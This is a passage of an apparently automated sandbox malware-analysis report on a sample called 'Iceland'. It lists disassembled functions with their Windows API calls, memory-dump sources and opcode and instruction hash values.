                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FC27A75E00225DFCB24CF98D990AAEB7B1FF49310F248179E94AAB391D771AD41CB90
                                                                                                                                                                                                                                                                Function 00A30340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00A315F2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                • Opcode ID: 90af22ce423653faeebbca887103ffcdbcb9f91a2e00cac7fc7a3720bf0d529f
                                                                                                                                                                                                                                                                • Instruction ID: 1d01ad913a96fb96b90c582d7d90db6148f51f04a3408a16f057ca971b31e437
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90af22ce423653faeebbca887103ffcdbcb9f91a2e00cac7fc7a3720bf0d529f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76B25775A08341CFDB24CF68C890A2AB7F1BB99304F24895DF98A8B351D771ED45CB92
                                                                                                                                                                                                                                                                Function 00A4014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00A409D8
                                                                                                                                                                                                                                                                  • Part of subcall function 00A43614: RaiseException.KERNEL32(?,?,?,00A409FA,?,00000000,?,?,?,?,?,?,00A409FA,00000000,00AE9758,00000000), ref: 00A43674
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00A409F5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                • Opcode ID: 4f7c2acd398aece3618eea7186ce38022bba42e0b1bf66ad415d58ad9b5262d9
                                                                                                                                                                                                                                                                • Instruction ID: 668058d2a29d3acbfcd5fea12ec1e968310cfc2001638611ba86f98128ef07ee
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f7c2acd398aece3618eea7186ce38022bba42e0b1bf66ad415d58ad9b5262d9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59F0AF3C90020DB7CF00BFA8E946D9A776C5E80350B604521BB1496593EB70EA5AA690
                                                                                                                                                                                                                                                                Function 00AA89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00AA8D52
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00AA8D59
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 00AA8F3A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 146820519-0
                                                                                                                                                                                                                                                                • Opcode ID: 0ea6762e0482a92a6833cf02ce45afb5fea16e088f49aeb057838f8908da6993
                                                                                                                                                                                                                                                                • Instruction ID: 94dab3915c8702ab9cdb12e24fb2affdf8f581af72b0cbcabd675e91f9f90081
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ea6762e0482a92a6833cf02ce45afb5fea16e088f49aeb057838f8908da6993
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66126A71A083019FC724DF28C584B2ABBE5BF89314F14895DE8898B292DB35ED45CF92
                                                                                                                                                                                                                                                                Function 00A22793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A232AF
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A232B7
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A232C2
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A232CD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A232D5
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A232DD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23205: RegisterWindowMessageW.USER32(00000004,?,00A22964), ref: 00A2325D
                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A22A0A
                                                                                                                                                                                                                                                                • OleInitialize.OLE32 ref: 00A22A28
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 00A63A0D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                • Opcode ID: fcb812385904a303df8b2dbe19b8c72f7764a601f8287eb52a69dd5a8bae1a0c
                                                                                                                                                                                                                                                                • Instruction ID: 53194e6aa0be38a7348f46c29694993a315b73d68eb7153e025b9d67656a344a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fcb812385904a303df8b2dbe19b8c72f7764a601f8287eb52a69dd5a8bae1a0c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50719CB09522058F9798EFF9AE657753AE4FB48345740423AE108C73B2EB784447DF94
                                                                                                                                                                                                                                                                Function 00A3FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A261A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A26299
                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 00A3FD36
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A3FD45
                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A7FE33
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                • Opcode ID: 1a1ecfbf02f8bc510284eec35c08a7d330c61ec8364069068c5df20ba0a7d056
                                                                                                                                                                                                                                                                • Instruction ID: 55ea5e4aa0c864362b1f921df5bc27929ac1edc79b273be18caef0eb02c979e1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a1ecfbf02f8bc510284eec35c08a7d330c61ec8364069068c5df20ba0a7d056
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7831C371904344AFEB32CF648C55BE6BBFCAB02308F0084AEE6DE97242D7745A85CB51
                                                                                                                                                                                                                                                                Function 00A58A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,00A5894C,?,00AE9CE8,0000000C), ref: 00A58A84
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00A5894C,?,00AE9CE8,0000000C), ref: 00A58A8E
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00A58AB9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                • Opcode ID: c439af55b2a32b28762209f15cab9b3c65afa1d4cfdd424a844352206ca0a4f6
                                                                                                                                                                                                                                                                • Instruction ID: 1a523581c67541a8e95ec738b0a75ada77d06bf78f47df74db9abec232311639
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c439af55b2a32b28762209f15cab9b3c65afa1d4cfdd424a844352206ca0a4f6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30016B32A051605AD6206374ED46B3E67457B857B6F2B065BFE14BB1D3DF388C894280
                                                                                                                                                                                                                                                                Function 00A5970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00A597BA,FF8BC369,00000000,00000002,00000000), ref: 00A59744
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00A597BA,FF8BC369,00000000,00000002,00000000,?,00A55ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00A46F41), ref: 00A5974E
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00A59755
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                • Opcode ID: c79cb835c01edf9cdf5590c95122005d648a43269eecb2258becd7190ef12a18
                                                                                                                                                                                                                                                                • Instruction ID: b0d6eeae1fbfc9966ade40f01cd67e206a92d99daf60cc00f8e93b76d1c6a0b8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c79cb835c01edf9cdf5590c95122005d648a43269eecb2258becd7190ef12a18
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8012836620114EFCF059FA9EC05C6F7B29FB89331B24035AFC119B190EB309D418B90
                                                                                                                                                                                                                                                                Function 00A2F238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00A2F27B
                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00A2F289
                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A2F29F
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00A2F2B1
                                                                                                                                                                                                                                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00A732D8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                • Opcode ID: 26da76d67ea83cac69a1d50afb52d597a04c16819ec2732739f617af0637af46
                                                                                                                                                                                                                                                                • Instruction ID: 0ee7af10e8cde0ad8f0722f2c28dd8b1fdf92436d64ff3d27dd793823393cd64
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26da76d67ea83cac69a1d50afb52d597a04c16819ec2732739f617af0637af46
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF05E312043459BEB70CBE4DC89FEA77ACEB45300F108A28F209930D1EB709588DB26
                                                                                                                                                                                                                                                                Function 00A32B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00A33006
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                • String ID: CALL
                                                                                                                                                                                                                                                                • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                • Opcode ID: cc3ff2b6b5b466389545921036fd2d949e18456e99948cd52659cf2a990c1fd4
                                                                                                                                                                                                                                                                • Instruction ID: bd81e4087e419bc9ff638a5573a3860fcd21af67d1a945c5d601e3b068488a86
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc3ff2b6b5b466389545921036fd2d949e18456e99948cd52659cf2a990c1fd4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46228C716083019FDB14DF28C881B2ABBF1BF89354F24895DF59A8B3A2D771E941CB52
                                                                                                                                                                                                                                                                Function 00A31990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 75264e4db9772e7df1c06bab6876ba715fe5b31c3185e467beeda36bb132d784
                                                                                                                                                                                                                                                                • Instruction ID: 89dbc3fc7a3cbac32296fb0c1592b994eb33c569af199056fab9423799bab3c8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75264e4db9772e7df1c06bab6876ba715fe5b31c3185e467beeda36bb132d784
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0532AA30A00615DFDB24DF68DD81BAEB7B4AF05314F14C569F91AAB2A1EB31ED40CB91
                                                                                                                                                                                                                                                                Function 00A23A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 00A6413B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A255D1,?,?,00A64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A25871
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A23A76
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                • String ID: X
                                                                                                                                                                                                                                                                • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                • Opcode ID: 82dd9b7b7ea006663574898ef26793666ddb117af34aad4f966d227265203225
                                                                                                                                                                                                                                                                • Instruction ID: 55f69231af04c6cbdbd78973048fd278d2e0a0cf5756034c838ffe6c70bd8ab1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82dd9b7b7ea006663574898ef26793666ddb117af34aad4f966d227265203225
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49219671E002689BCF01DFD8D805BEE7BFCAF49304F008029E545A7281DBF99A898F61
                                                                                                                                                                                                                                                                Function 00A2396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A23A3C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                • Opcode ID: 05091f9bb5f4ca69c69df4f545793bc62a7e3b64206f92d38abdfe3554bc9294
                                                                                                                                                                                                                                                                • Instruction ID: 2c9e49d55e03b6989008dec6eb37de30eff1bff1419ade1174ecc215b9f41062
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05091f9bb5f4ca69c69df4f545793bc62a7e3b64206f92d38abdfe3554bc9294
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC3193B15047119FE720DF68E8847A7BBF8FB49708F000A3EE6D987241E775A948CB52
                                                                                                                                                                                                                                                                Function 00A2331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsThemeActive.UXTHEME ref: 00A2333D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A232E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A232FB
